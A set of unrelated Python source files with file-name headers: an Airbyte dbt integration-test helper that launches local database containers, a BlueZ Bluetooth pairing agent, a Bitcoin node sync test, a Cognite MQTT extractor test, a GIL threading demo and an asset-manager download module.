gap_pos = np.where(new_two_seq_t != '_')
new_two_seq = list(new_two_seq_t[gap_pos])
else:
tmpseqs1 = tmpseqs[:int(len(tmpseqs)/2)]
tmpseqs2 = tmpseqs[int(len(tmpseqs)/2):]
tmpseqsscore = self.executor.execute(tmpseqs1, tmpseqs2, 0)
if self.mode == 'NW':
if tmpseqsscore.iloc[len(tmpseqs1),len(tmpseqs2)] >= len(tmpseqs)/2 * 0.6:
new_two_seq = list(tmpseqs1)
elif self.mode == 'DTW':
if tmpseqsscore.iloc[len(tmpseqs1)-1,len(tmpseqs2)-1] <= len(tmpseqs)/2 * 0.1:
new_two_seq = list(tmpseqs1)
else:
print('mode error')
return new_two_seq, one_seqs
|
dbt_integration_test.py
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import json
import os
import random
import re
import socket
import string
import subprocess
import sys
import threading
import time
from copy import copy
from typing import Any, Callable, Dict, List
from normalization.destination_type import DestinationType
from normalization.transform_catalog.transform import read_yaml_config, write_yaml_config
from normalization.transform_config.transform import TransformConfig
NORMALIZATION_TEST_TARGET = "NORMALIZATION_TEST_TARGET"
NORMALIZATION_TEST_MSSQL_DB_PORT = "NORMALIZATION_TEST_MSSQL_DB_PORT"
NORMALIZATION_TEST_MYSQL_DB_PORT = "NORMALIZATION_TEST_MYSQL_DB_PORT"
NORMALIZATION_TEST_POSTGRES_DB_PORT = "NORMALIZATION_TEST_POSTGRES_DB_PORT"
NORMALIZATION_TEST_CLICKHOUSE_DB_PORT = "NORMALIZATION_TEST_CLICKHOUSE_DB_PORT"
class DbtIntegrationTest(object):
def __init__(self):
self.target_schema = "test_normalization"
self.container_prefix = f"test_normalization_db_{self.random_string(3)}"
self.db_names = []
@staticmethod
def generate_random_string(prefix: str) -> str:
return prefix + DbtIntegrationTest.random_string(5)
@staticmethod
def random_string(length: int) -> str:
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def set_target_schema(self, target_schema: str):
self.target_schema = target_schema
def setup_db(self, destinations_to_test: List[str]):
if DestinationType.POSTGRES.value in destinations_to_test:
self.setup_postgres_db()
if DestinationType.MYSQL.value in destinations_to_test:
self.setup_mysql_db()
if DestinationType.MSSQL.value in destinations_to_test:
self.setup_mssql_db()
if DestinationType.CLICKHOUSE.value in destinations_to_test:
self.setup_clickhouse_db()
def setup_postgres_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_POSTGRES_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_POSTGRES_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"username": "integration-tests",
"password": "integration-tests",
"port": port,
"database": "postgres",
"schema": self.target_schema,
}
if start_db:
self.db_names.append("postgres")
print("Starting localhost postgres container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_postgres",
"-e",
f"POSTGRES_USER={config['username']}",
"-e",
f"POSTGRES_PASSWORD={config['password']}",
"-p",
f"{config['port']}:5432",
"-d",
"marcosmarxm/postgres-ssl:dev",
"-c",
"ssl=on",
"-c",
"ssl_cert_file=/var/lib/postgresql/server.crt",
"-c",
"ssl_key_file=/var/lib/postgresql/server.key",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for Postgres DB to start...15 sec")
time.sleep(15)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/postgres.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mysql_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_MYSQL_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_MYSQL_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "root",
"password": "",
}
if start_db:
self.db_names.append("mysql")
print("Starting localhost mysql container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mysql",
"-e",
"MYSQL_ALLOW_EMPTY_PASSWORD=yes",
"-e",
"MYSQL_INITDB_SKIP_TZINFO=yes",
"-e",
f"MYSQL_DATABASE={config['database']}",
"-p",
f"{config['port']}:3306",
"-d",
"mysql",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for MySQL DB to start...15 sec")
time.sleep(15)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mysql.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mssql_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_MSSQL_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_MSSQL_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"username": "SA",
"password": "MyStr0ngP@ssw0rd",
"port": port,
"database": self.target_schema,
"schema": self.target_schema,
}
if start_db:
self.db_names.append("mssql")
print("Starting localhost MS SQL Server container for tests")
command_start_container = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mssql",
"-h",
f"{self.container_prefix}_mssql",
"-e",
"ACCEPT_EULA='Y'",
"-e",
f"SA_PASSWORD='{config['password']}'",
"-e",
"MSSQL_PID='Standard'",
"-p",
f"{config['port']}:1433",
"-d",
"mcr.microsoft.com/mssql/server:2019-GA-ubuntu-16.04",
]
# cmds & parameters
cmd_start_container = " ".join(command_start_container)
wait_sec = 30
# run the docker container
print("Executing: ", cmd_start_container)
subprocess.check_call(cmd_start_container, shell=True)
# wait for service is available
print(f"....Waiting for MS SQL Server to start...{wait_sec} sec")
time.sleep(wait_sec)
# Run additional commands to prepare the table
command_create_db = [
"docker",
"exec",
f"{self.container_prefix}_mssql",
"/opt/mssql-tools/bin/sqlcmd",
"-S",
config["host"],
"-U",
config["username"],
"-P",
config["password"],
"-Q",
f"CREATE DATABASE [{config['database']}]",
]
# create test db
print("Executing: ", " ".join(command_create_db))
subprocess.call(command_create_db)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mssql.json", "w") as fh:
fh.write(json.dumps(config))
def setup_clickhouse_db(self):
"""
ClickHouse official JDBC driver use HTTP port 8123, while Python ClickHouse
driver uses native port 9000, so we need to open both ports for destination
connector and dbt container respectively.
Ref: https://altinity.com/blog/2019/3/15/clickhouse-networking-part-1
"""
start_db = True
if os.getenv(NORMALIZATION_TEST_CLICKHOUSE_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_CLICKHOUSE_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "default",
"password": "",
"ssl": False,
}
if start_db:
self.db_names.append("clickhouse")
print("Starting localhost clickhouse container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_clickhouse",
"--ulimit",
"nofile=262144:262144",
"-p",
"9000:9000", # Python clickhouse driver use native port
"-p",
f"{config['port']}:8123", # clickhouse JDBC driver use HTTP port
"-d",
# so far, only the latest version ClickHouse server image turned on
# window functions
"clickhouse/clickhouse-server:latest",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for ClickHouse DB to start...15 sec")
time.sleep(15)
# Run additional commands to prepare the table
command_create_db = [
"docker",
"run",
"--rm",
"--link",
f"{self.container_prefix}_clickhouse:clickhouse-server",
"clickhouse/clickhouse-client:21.8.10.19",
"--host",
"clickhouse-server",
"--query",
f"CREATE DATABASE IF NOT EXISTS {config['database']}",
]
# create test db
print("Executing: ", " ".join(command_create_db))
subprocess.call(command_create_db)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/clickhouse.json", "w") as fh:
fh.write(json.dumps(config))
@staticmethod
def find_free_port():
"""
Find an unused port to create a database listening on localhost to run destination-postgres
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
addr = s.getsockname()
s.close()
return addr[1]
def tear_down_db(self):
for db_name in self.db_names:
print(f"Stopping localhost {db_name} container for tests")
try:
subprocess.call(["docker", "kill", f"{self.container_prefix}_{db_name}"])
except Exception as e:
print(f"WARN: Exception while shutting down {db_name}: {e}")
@staticmethod
def change_current_test_dir(request):
# This makes the test run whether it is executed from the tests folder (with pytest/gradle)
# or from the base-normalization folder (through pycharm)
integration_tests_dir = os.path.join(request.fspath.dirname, "integration_tests")
if os.path.exists(integration_tests_dir):
os.chdir(integration_tests_dir)
else:
os.chdir(request.fspath.dirname)
def generate_profile_yaml_file(
self, destination_type: DestinationType, test_root_dir: str, random_schema: bool = False
) -> Dict[str, Any]:
"""
Each destination requires different settings to connect to. This step generates the adequate profiles.yml
as described here: https://docs.getdbt.com/reference/profiles.yml
"""
config_generator = TransformConfig()
profiles_config = config_generator.read_json_config(f"../secrets/{destination_type.value.lower()}.json")
# Adapt credential file to look like destination config.json
if destination_type.value == DestinationType.BIGQUERY.value:
credentials = profiles_config["basic_bigquery_config"]
profiles_config = {
"credentials_json": json.dumps(credentials),
"dataset_id": self.target_schema,
"project_id": credentials["project_id"],
}
elif destination_type.value == DestinationType.MYSQL.value:
profiles_config["database"] = self.target_schema
elif destination_type.value == DestinationType.REDSHIFT.value:
profiles_config["schema"] = self.target_schema
if random_schema:
profiles_config["schema"] = self.target_schema + "_" + "".join(random.choices(string.ascii_lowercase, k=5))
else:
profiles_config["schema"] = self.target_schema
if destination_type.value == DestinationType.CLICKHOUSE.value:
# Python ClickHouse driver uses native port 9000, which is different
# from official ClickHouse JDBC driver
clickhouse_config = copy(profiles_config)
clickhouse_config["port"] = 9000
profiles_yaml = config_generator.transform(destination_type, clickhouse_config)
else:
profiles_yaml = config_generator.transform(destination_type, profiles_config)
config_generator.write_yaml_config(test_root_dir, profiles_yaml, "profiles.yml")
return profiles_config
@staticmethod
def run_destination_process(message_file: str, test_root_dir: str, commands: List[str]):
print("Executing: ", " ".join(commands))
with open(os.path.join(test_root_dir, "destination_output.log"), "ab") as f:
process = subprocess.Popen(commands, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def writer():
if os.path.exists(message_file):
with open(message_file, "rb") as input_data:
while True:
line = input_data.readline()
if not line:
break
process.stdin.write(line)
process.stdin.close()
thread = threading.Thread(target=writer)
thread.start()
for line in iter(process.stdout.readline, b""):
f.write(line)
sys.stdout.write(line.decode("utf-8"))
thread.join()
process.wait()
return process.returncode == 0
@staticmethod
def get_normalization_image(destination_type: DestinationType) -> str:
if DestinationType.MSSQL.value == destination_type.value:
return "airbyte/normalization-mssql:dev"
elif DestinationType.MYSQL.value == destination_type.value:
return "airbyte/normalization-mysql:dev"
elif DestinationType.ORACLE.value == destination_type.value:
return "airbyte/normalization-oracle:dev"
elif DestinationType.CLICKHOUSE.value == destination_type.value:
return "airbyte/normalization-clickhouse:dev"
elif DestinationType.SNOWFLAKE.value == destination_type.value:
return "airbyte/normalization-snowflake:dev"
elif DestinationType.REDSHIFT.value == destination_type.value:
return "airbyte/normalization-redshift:dev"
else:
return "airbyte/normalization:dev"
def dbt_check(self, destination_type: DestinationType, test_root_dir: str):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
normalization_image: str = self.get_normalization_image(destination_type)
# Perform sanity check on dbt project settings
assert self.run_check_dbt_command(normalization_image, "debug", test_root_dir)
assert self.run_check_dbt_command(normalization_image, "deps", test_root_dir)
def dbt_run(self, destination_type: DestinationType, test_root_dir: str, force_full_refresh: bool = False):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
normalization_image: str = self.get_normalization_image(destination_type)
# Compile dbt models files into destination sql dialect, then run the transformation queries
assert self.run_check_dbt_command(normalization_image, "run", test_root_dir, force_full_refresh)
@staticmethod
def run_check_dbt_command(normalization_image: str, command: str, cwd: str, force_full_refresh: bool = False) -> bool:
"""
Run dbt subprocess while checking and counting for "ERROR", "FAIL" or "WARNING" printed in its outputs
"""
if normalization_image.startswith("airbyte/normalization-oracle") or normalization_image.startswith("airbyte/normalization-mysql"):
dbtAdditionalArgs = []
else:
dbtAdditionalArgs = ["--event-buffer-size=10000"]
error_count = 0
commands = (
[
"docker",
"run",
"--rm",
"--init",
"-v",
f"{cwd}:/workspace",
"-v",
f"{cwd}/build:/build",
"-v",
f"{cwd}/logs:/logs",
"-v",
f"{cwd}/build/dbt_packages:/dbt",
"--network",
"host",
"--entrypoint",
"/usr/local/bin/dbt",
"-i",
normalization_image,
]
+ dbtAdditionalArgs
+ [
command,
"--profiles-dir=/workspace",
"--project-dir=/workspace",
]
)
if force_full_refresh:
commands.append("--full-refresh")
command = f"{command} --full-refresh"
print("Executing: ", " ".join(commands))
print(f"Equivalent to: dbt {command} --profiles-dir={cwd} --project-dir={cwd}")
with open(os.path.join(cwd, "dbt_output.log"), "ab") as f:
process = subprocess.Popen(commands, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ)
for line in iter(lambda: process.stdout.readline(), b""):
f.write(line)
str_line = line.decode("utf-8")
sys.stdout.write(str_line)
# keywords to match lines as signaling errors
if "ERROR" in str_line or "FAIL" in str_line or "WARNING" in str_line:
# exception keywords in lines to ignore as errors (such as summary or expected warnings)
is_exception = False
for except_clause in [
"Done.", # DBT Summary
"PASS=", # DBT Summary
"Nothing to do.", # When no schema/data tests are setup
"Configuration paths exist in your dbt_project.yml", # When no cte / view are generated
"Error loading config file: .dockercfg: $HOME is not defined", # ignore warning
"depends on a node named 'disabled_test' which was not found", # Tests throwing warning because it is disabled
"The requested image's platform (linux/amd64) does not match the detected host platform "
+ "(linux/arm64/v8) and no specific platform was requested", # temporary patch until we publish images for arm64
]:
if except_clause in str_line:
is_exception = True
break
if not is_exception:
# count lines signaling an error/failure/warning
error_count += 1
process.wait()
message = (
f"{' '.join(commands)}\n\tterminated with return code {process.returncode} "
f"with {error_count} 'Error/Warning/Fail' mention(s)."
)
print(message)
assert error_count == 0, message
assert process.returncode == 0, message
if error_count > 0:
return False
return process.returncode == 0
@staticmethod
def copy_replace(src, dst, pattern=None, replace_value=None):
"""
Copies a file from src to dst replacing pattern by replace_value
Parameters
----------
src : string
Path to the source filename to copy from
dst : string
Path to the output filename to copy to
pattern
list of Patterns to replace inside the src file
replace_value
list of Values to replace by in the dst file
"""
file1 = open(src, "r") if isinstance(src, str) else src
file2 = open(dst, "w") if isinstance(dst, str) else dst
pattern = [pattern] if isinstance(pattern, str) else pattern
replace_value = [replace_value] if isinstance(replace_value, str) else replace_value
if replace_value and pattern:
if len(replace_value) != len(pattern):
raise Exception("Invalid parameters: pattern and replace_value" " have different sizes.")
rules = [(re.compile(regex, re.IGNORECASE), value) for regex, value in zip(pattern, replace_value)]
else:
rules = []
for line in file1:
if rules:
for rule in rules:
line = re.sub(rule[0], rule[1], line)
file2.write(line)
if isinstance(src, str):
file1.close()
if isinstance(dst, str):
file2.close()
@staticmethod
def get_test_targets() -> List[str]:
"""
Returns a list of destinations to run tests on.
if the environment variable NORMALIZATION_TEST_TARGET is set with a comma separated list of destination names,
then the tests are run only on that subsets of destinations
Otherwise tests are run against all destinations
"""
if os.getenv(NORMALIZATION_TEST_TARGET):
target_str = os.getenv(NORMALIZATION_TEST_TARGET)
return [d.value for d in {DestinationType.from_string(s.strip()) for s in target_str.split(",")}]
else:
return [d.value for d in DestinationType]
@staticmethod
def update_yaml_file(filename: str, callback: Callable):
config = read_yaml_config(filename)
updated, config = callback(config)
if updated:
write_yaml_config(config, filename)
|
agent.py
|
import logging
import threading
import dbus
import dbus.service
from gi.repository import GLib
from .notify import Notify
AGENT_INTERFACE = "org.bluez.Agent1"
DEVICE_INTERFACE = "org.bluez.Device1"
class Device:
def __init__(self, bus: dbus.SystemBus, device):
self._device = dbus.Interface(
bus.get_object("org.bluez", device), "org.freedesktop.DBus.Properties"
)
@property
def trusted(self) -> bool:
return self._device.Get(DEVICE_INTERFACE, "Trusted")
@trusted.setter
def trusted(self, trust: bool):
self._device.Set(DEVICE_INTERFACE, "Trusted", trust)
@property
def alias(self) -> str:
return self._device.Get(DEVICE_INTERFACE, "Alias")
class Rejected(dbus.DBusException):
_dbus_error_name = "org.bluez.Error.Rejected"
class Agent(dbus.service.Object):
def __init__(
self,
bus: dbus.SystemBus,
path: str = "/bot/agent",
capability: str = "DisplayOnly",
):
self._bus = bus
self._path = path
self._blocking_io = None
self._mainloop = None
self._capability = capability
self._logger = logging.getLogger(__name__)
self._logger.setLevel(logging.INFO)
super().__init__(self._bus, path)
def start(self, blocking_io: Notify):
self._blocking_io = blocking_io
self._mainloop = GLib.MainLoop()
manager = dbus.Interface(
self._bus.get_object("org.bluez", "/org/bluez"), "org.bluez.AgentManager1"
)
manager.RegisterAgent(self._path, self._capability)
self._logger.info("Agent registered")
manager.RequestDefaultAgent(self._path)
manager_thread = threading.Thread(target=self._mainloop.run)
manager_thread.start()
def stop(self):
self._mainloop.quit()
exit_on_release = True
@property
def set_exit_on_release(self):
return self.exit_on_release
@set_exit_on_release.setter
def set_exit_on_release(self, exit_on_release):
self.exit_on_release = exit_on_release
@dbus.service.method(AGENT_INTERFACE, in_signature="", out_signature="")
def Release(self):
self._logger.info("Release")
if self.exit_on_release:
self._mainloop.quit()
@dbus.service.method(AGENT_INTERFACE, in_signature="os", out_signature="")
def AuthorizeService(self, device, uuid):
device = Device(self._bus, device)
print(f"AuthorizeService ({device.alias}, {uuid})")
authorize = input("Authorize connection (yes/no): ")
if authorize == "yes":
return
raise Rejected("Connection rejected by user")
@dbus.service.method(AGENT_INTERFACE, in_signature="o", out_signature="s")
def RequestPinCode(self, device):
device = Device(self._bus, device)
print(f"RequestPinCode {device.alias}")
device.trusted = True
return input("Enter PIN Code: ")
@dbus.service.method(AGENT_INTERFACE, in_signature="o", out_signature="u")
def RequestPasskey(self, device):
device = Device(self._bus, device)
print(f"RequestPasskey {device.alias}")
device.trusted = True
passkey = input("Enter passkey: ")
return dbus.UInt32(passkey)
@dbus.service.method(AGENT_INTERFACE, in_signature="ouq", out_signature="")
def DisplayPasskey(self, device, passkey, entered):
device = Device(self._bus, device)
self._logger.info(
f"DisplayPasskey ({device.alias}, {passkey} entered {entered})"
)
@dbus.service.method(AGENT_INTERFACE, in_signature="os", out_signature="")
def DisplayPinCode(self, device, pincode):
device = Device(self._bus, device)
self._logger.info(f"DisplayPinCode {device.alias} {pincode}")
@dbus.service.method(AGENT_INTERFACE, in_signature="ou", out_signature="")
def RequestConfirmation(self, device, pin):
device = Device(self._bus, device)
confirm = self._blocking_io.confirm_message(device.alias)
if confirm:
device.trusted = True
self._blocking_io.accepted(device.alias)
return
self._blocking_io.rejected(device.alias)
raise Rejected("Passkey doesn't match")
@dbus.service.method(AGENT_INTERFACE, in_signature="o", out_signature="")
def RequestAuthorization(self, device):
device = Device(self._bus, device)
print(f"RequestAuthorization {device.alias}")
auth = input("Authorize? (yes/no): ")
if auth == "yes":
return
raise Rejected("Pairing rejected")
@dbus.service.method(AGENT_INTERFACE, in_signature="", out_signature="")
def Cancel(self):
self._logger.info("Cancel")
|
sync.py
|
#!/usr/bin/env python3
# Copyright (c) 2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test sync
#
from test_framework import BitcoinTestFramework
from authproxy import AuthServiceProxy, JSONRPCException
from util import *
import os
import shutil
import random
from threading import Thread
from queue import Queue
def mineSingleBlock(miningQueue):
while not miningQueue.empty():
taskObject = miningQueue.get()
taskCompleted = False
nodeToWorkOn = taskObject[0]
blockCount = taskObject[1]
while not taskCompleted:
try:
if blockCount > 0:
nodeToWorkOn.setgenerate(True,1)
blockCount -= 1
else:
taskCompleted = True
miningQueue.task_done()
except Exception as e:
# This exception is due to a failure to mine this specific block
dummyExceptionHandling = str(e)
return True
class SyncTest(BitcoinTestFramework):
def run_test(self):
# Mine 51 up blocks - by randomly asking nodes
nodeIdsToGenerateNextBlock = [random.randrange(len(self.nodes)) for j in range(51)]
numberOfBlocksPerNode = {i: nodeIdsToGenerateNextBlock.count(i) for i in nodeIdsToGenerateNextBlock}
nodeMiningQueues = [ Queue() ] * len(self.nodes)
for nodeId in range(len(self.nodes)):
nodeMiningQueues[nodeId].put((self.nodes[nodeId],numberOfBlocksPerNode[nodeId]))
for nodeThreadIndex in range(len(self.nodes)):
worker = Thread(target=mineSingleBlock,args=[nodeMiningQueues[nodeThreadIndex]] )
worker.setDaemon(True)
worker.start()
for qObj in nodeMiningQueues:
qObj.join()
sync_blocks(self.nodes)
self.nodes[1].setgenerate(True, 50)
sync_blocks(self.nodes)
bestBlockHash = self.nodes[0].getbestblockhash()
print("Block count totals {}".format(self.nodes[0].getblockcount()) )
for node in self.nodes[:1]:
assert_equal(node.getbestblockhash() , bestBlockHash)
if __name__ == '__main__':
SyncTest().main()
|
test_extractor.py
|
# Copyright 2022 Cognite AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import math
import random
import threading
import time
import unittest
from dataclasses import dataclass
from typing import Optional
from cognite.extractorutils.throttle import throttled_loop
from cognite.extractorutils.uploader_types import InsertDatapoints
from cognite.extractorutils.mqtt.extractor import MqttExtractor
@dataclass
class RawDatapoint:
id: Optional[str]
timestamp: Optional[float]
value: Optional[float]
test_id = random.randint(0, 2 ** 31)
class IntegrationTests(unittest.TestCase):
ts_1: str = f"mqtt_util_integration_ts_test_1-{test_id}"
def setUp(self) -> None:
self.event = threading.Event()
self.extractor = MqttExtractor(
name="test_mqtt_extractor",
description="Test mqtt extractor",
version="1.0.0",
cancelation_token=self.event,
override_path="config_test.yml",
)
self.extractor._upload_interval = 1
def tearDown(self) -> None:
self.extractor.cognite_client.time_series.delete(external_id=self.ts_1, ignore_unknown_ids=True)
self.mqttClient.loop_stop()
def test_ts_extraction(self) -> None:
@self.extractor.topic(topic="ts-topic-1", qos=1, response_type=RawDatapoint)
def handle_ts(dp: RawDatapoint) -> None:
return InsertDatapoints(external_id=dp.id, datapoints=[(dp.timestamp, dp.value)])
def run_loop() -> None:
iter = 0
self.mqttClient = self.extractor._create_mqtt_client("integration-test-publisher")
self.mqttClient.connect_async(
self.extractor.config.source.host,
self.extractor.config.source.port,
self.extractor.config.source.keep_alive,
)
self.mqttClient.loop_start()
for _ in throttled_loop(1, self.event):
raw_data = json.dumps(
{"id": self.ts_1, "value": math.sin(time.time() / 10), "timestamp": time.time() * 1000}
)
self.mqttClient.publish("ts-topic-1", raw_data, 1)
try:
points = self.extractor.cognite_client.datapoints.retrieve(
external_id=self.ts_1, start="1w-ago", end="now", limit=None, ignore_unknown_ids=True
)
if points is not None and points.count > 1:
self.event.set()
else:
iter += 1
if iter > 5:
self.event.set()
except:
self.event.set()
self.mqttClient.loop_stop()
thread = threading.Thread(target=run_loop, name="publish-loop")
with self.extractor:
thread.start()
self.extractor.run()
thread.join()
points = self.extractor.cognite_client.datapoints.retrieve(
external_id=self.ts_1, start="1w-ago", end="now", limit=None, ignore_unknown_ids=True
)
assert points is not None and len(points.value) > 0
|
cache.py
|
'''
# GIL,全局解释器锁
本质上是类似操作系统的互斥锁 Mutex
1. CPython 引进 GIL 其实主要就是这么两个原因:
一是设计者为了规避类似于内存管理这样的复杂的竞争风险问题(race condition);
二是因为 CPython 大量使用 C 语言库,但大部分 C 语言库都不是原生线程安全的
(线程安全会降低性能和增加复杂度)
2. GIL 是如何工作的
1 . 一个线程在开始执行时,都会锁住 GIL,以阻止别的线程执行;
同样的,每一个线程执行完一段后,会释放 GIL,以允许别的线程开始利用资源
2. check_interval,意思是 CPython 解释器会去轮询检查线程 GIL 的锁住情况。
每隔一段时间,Python 解释器就会强制当前线程去释放 GIL,这样别的线程才能有执行的机会
3. Python 的线程安全(应用层面并不是)
函数本身是由多层堆栈的, 而这并不是线程安全的
>>> import dis
>>> dis.dis(foo)
LOAD_GLOBAL 0 (n)
LOAD_CONST 1 (1)
INPLACE_ADD
STORE_GLOBAL 0 (n)
GIL 的设计,主要是为了方便 CPython 解释器层面的编写者,而不是 Python 应用层面的程序员
作为 Python 的使用者,我们还是需要 lock 等工具,来确保线程安全
'''
import time
import concurrent.futures
import threading
import asyncio
def CountDown(n):
while n > 0:
n -= 1
def multipleThread(n):
for _ in range(2):
th = threading.Thread(target=CountDown, args=[n//2])
th.start()
th.join()
async def asyCountDown(n):
while n > 0:
n -= 1
async def asyncThread(n):
asyncio.create_task(asyCountDown(n))
# 应用级别也要保证线程安全
n = 0
lock = threading.Lock()
def foo():
'''
要保证线程安全
'''
global n
# with lock:
n += 1
def test():
threads = []
for i in range(100):
t = threading.Thread(target=foo)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
print(n)
if __name__ == "__main__":
start_time = time.perf_counter()
CountDown(50000000)
end_time = time.perf_counter()
print('thread run time: ', end_time-start_time)
# start_time = time.perf_counter()
# multipleThread(100000000)
# end_time = time.perf_counter()
# print('multipleProcess run time: ', end_time-start_time)
start_time = time.perf_counter()
asyncio.run(asyncThread(50000000))
end_time = time.perf_counter()
print('asyncThread run time: ', end_time-start_time)
|
_assetmanager.py
|
# Released under the MIT License. See LICENSE for details.
#
"""Functionality related to managing cloud based assets."""
from __future__ import annotations
from typing import TYPE_CHECKING
from pathlib import Path
import threading
import urllib.request
import logging
import weakref
import time
import os
import sys
from efro import entity
if TYPE_CHECKING:
from bacommon.assets import AssetPackageFlavor
from typing import List
class FileValue(entity.CompoundValue):
"""State for an individual file."""
class State(entity.Entity):
"""Holds all persistent state for the asset-manager."""
files = entity.CompoundDictField('files', str, FileValue())
class AssetManager:
"""Wrangles all assets."""
_state: State
def __init__(self, rootdir: Path) -> None:
print('AssetManager()')
assert isinstance(rootdir, Path)
self.thread_ident = threading.get_ident()
self._rootdir = rootdir
self._started = False
if not self._rootdir.is_dir():
raise RuntimeError(f'Provided rootdir does not exist: "{rootdir}"')
self.load_state()
def __del__(self) -> None:
print('~AssetManager()')
if self._started:
logging.warning('AssetManager dying in a started state.')
def launch_gather(
self,
packages: List[str],
flavor: AssetPackageFlavor,
account_token: str,
) -> AssetGather:
"""Spawn an asset-gather operation from this manager."""
print('would gather', packages, 'and flavor', flavor, 'with token',
account_token)
return AssetGather(self)
def update(self) -> None:
"""Can be called periodically to perform upkeep."""
def start(self) -> None:
"""Tell the manager to start working.
This will initiate network activity and other processing.
"""
if self._started:
logging.warning('AssetManager.start() called on running manager.')
self._started = True
def stop(self) -> None:
"""Tell the manager to stop working.
All network activity should be ceased before this function returns.
"""
if not self._started:
logging.warning('AssetManager.stop() called on stopped manager.')
self._started = False
self.save_state()
@property
def rootdir(self) -> Path:
"""The root directory for this manager."""
return self._rootdir
@property
def state_path(self) -> Path:
"""The path of the state file."""
return Path(self._rootdir, 'state')
def load_state(self) -> None:
"""Loads state from disk. Resets to default state if unable to."""
print('ASSET-MANAGER LOADING STATE')
try:
state_path = self.state_path
if state_path.exists():
with open(self.state_path, encoding='utf-8') as infile:
self._state = State.from_json_str(infile.read())
return
except Exception:
logging.exception('Error loading existing AssetManager state')
self._state = State()
def save_state(self) -> None:
"""Save state to disk (if possible)."""
print('ASSET-MANAGER SAVING STATE')
try:
with open(self.state_path, 'w', encoding='utf-8') as outfile:
outfile.write(self._state.to_json_str())
except Exception:
logging.exception('Error writing AssetManager state')
class AssetGather:
"""Wrangles a gathering of assets."""
def __init__(self, manager: AssetManager) -> None:
assert threading.get_ident() == manager.thread_ident
self._manager = weakref.ref(manager)
# self._valid = True
print('AssetGather()')
# url = 'https://files.ballistica.net/bombsquad/promo/BSGamePlay.mov'
# url = 'http://www.python.org/ftp/python/2.7.3/Python-2.7.3.tgz'
# fetch_url(url,
# filename=Path(manager.rootdir, 'testdl'),
# asset_gather=self)
# print('fetch success')
thread = threading.Thread(target=self._run)
thread.run()
def _run(self) -> None:
"""Run the gather in a background thread."""
print('hello from gather bg')
# First, do some sort of.
# @property
# def valid(self) -> bool:
# """Whether this gather is still valid.
# A gather becomes in valid if its originating AssetManager dies.
# """
# return True
def __del__(self) -> None:
print('~AssetGather()')
def fetch_url(url: str, filename: Path, asset_gather: AssetGather) -> None:
"""Fetch a given url to a given filename for a given AssetGather.
"""
# pylint: disable=consider-using-with
import socket
# We don't want to keep the provided AssetGather alive, but we want
# to abort if it dies.
assert isinstance(asset_gather, AssetGather)
# weak_gather = weakref.ref(asset_gather)
# Pass a very short timeout to urllib so we have opportunities
# to cancel even with network blockage.
req = urllib.request.urlopen(url, timeout=1)
file_size = int(req.headers['Content-Length'])
print(f'\nDownloading: {filename} Bytes: {file_size:,}')
def doit() -> None:
time.sleep(1)
print('dir', type(req.fp), dir(req.fp))
print('WOULD DO IT', flush=True)
# req.close()
# req.fp.close()
threading.Thread(target=doit).run()
with open(filename, 'wb') as outfile:
file_size_dl = 0
block_sz = 1024 * 1024 * 1000
time_outs = 0
while True:
try:
data = req.read(block_sz)
except ValueError:
import traceback
traceback.print_exc()
print('VALUEERROR', flush=True)
break
except socket.timeout:
print('TIMEOUT', flush=True)
# File has not had activity in max seconds.
if time_outs > 3:
print('\n\n\nsorry -- try back later')
os.unlink(filename)
raise
print('\nHmmm... little issue... '
'I\'ll wait a couple of seconds')
time.sleep(3)
time_outs += 1
continue
# We reached the end of the download!
if not data:
sys.stdout.write('\rDone!\n\n')
sys.stdout.flush()
break
file_size_dl += len(data)
outfile.write(data)
percent = file_size_dl * 1.0 / file_size
status = f'{file_size_dl:20,} Bytes [{percent:.2%}] received'
sys.stdout.write('\r' + status)
sys.stdout.flush()
print('done with', req.fp)
|
app.py
|
#!/user/bin/env python
